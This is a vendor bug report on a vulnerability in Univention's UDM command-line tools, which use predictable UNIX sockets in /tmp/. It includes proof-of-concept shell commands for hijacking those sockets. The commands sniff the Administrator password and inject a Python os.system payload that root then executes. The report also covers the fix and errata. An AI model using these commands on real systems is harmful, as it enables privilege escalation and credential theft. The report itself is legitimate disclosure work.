Univention Bugzilla – Bug 40422
local root code execution vulnerability as every user because UDM CLI uses sockets from /tmp/
Last modified: 2021-06-23 07:29:10 CEST
As the UDM-CLI tools connects to UNIX sockets in /tmp/ everybody is able to "play" CLI-Server. For example the user "nobody" may create that unix socket and just needs to wait for the Administrator/or a joinscript/postinst/whatever to send requests to that socket. It allows a MITM attack e.g. to sniff the password. nobody@master:~$ mkdir /tmp/admincli_0 nobody@master:~$ socat unix-listen:/tmp/admincli_0/sock stdout ['/usr/sbin/udm', 'users/user', 'modify', '--dn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--set', 'password=foo', '--binddn', 'uid=Administrator,cn=users,dc=saml,dc=dev', '--bindpw', 'univention'] As the password is anyway in the processlist this is not more critical than that a user has access to the system (e.g. due to Bug #39678 comment 7)
[DoS]: Therefore "nobody" is able to completely block every UDM-CLI call forever.
And another thing is that code is executed which is send to the socket in both directions: → let user 'root' execute code (logged in a user nobody): # su nobody nobody:/$ mkdir /tmp/admincli_0 nobody:/$ printf "__import__('os').system('touch /tmp/evaled')\x00" | socat unix-listen:/tmp/admincli_0/sock stdin nobody:/$ ls -l /tmp/evaled -rw-r--r-- 1 root root 0 Jun 23 18:35 /tmp/evaled → Execute code on the server (harmless, as the same user): printf "__import__('os').system('touch /tmp/evaled')\x00" | socat stdin unix-connect:/tmp/admincli_65534/sock
* Code is now evaluated with ast.literal_eval(). * Sockets are checked if the uid is the same as the current/calling UID. → Should we check also permissions here? * If the connection fails it is retried with a socket name containing random values to prevent that someone makes UDM unusable for non-root users. univention-directory-manager-modules (11.0.3-17): r70594 | Bug #40422: fix local root code execution and MITM vulnerability
OK: r70594 OK: udm modules OK: su -c '/usr/sbin/udm users/user' Administrator OK: mkdir /tmp/admincli_2002;touch /tmp/admincli_200/socket{,.run};time su -c '/usr/sbin/udm users/user' Administrator # delayed ~30s FYI: A user visible progress would be nice as those 30s massively delay the CLI usage ; bash-completion seems to be broken. FIXED: univention-directory-manager-modules.yaml r70667 | Bug #40422 et al: UDM YAML OK: errata-announce -V --only univention-directory-manager-modules.yaml
(In reply to Philipp Hahn from comment #4) > FYI: A user visible progress would be nice as those 30s massively delay the > CLI usage ; bash-completion seems to be broken. Yes, I saw this, too. I see no reason to wait 30 seconds. I'll add a note to Bug #33224.
*** Bug 37604 has been marked as a duplicate of this bug. ***
<http://errata.software-univention.de/ucs/4.1/208.html>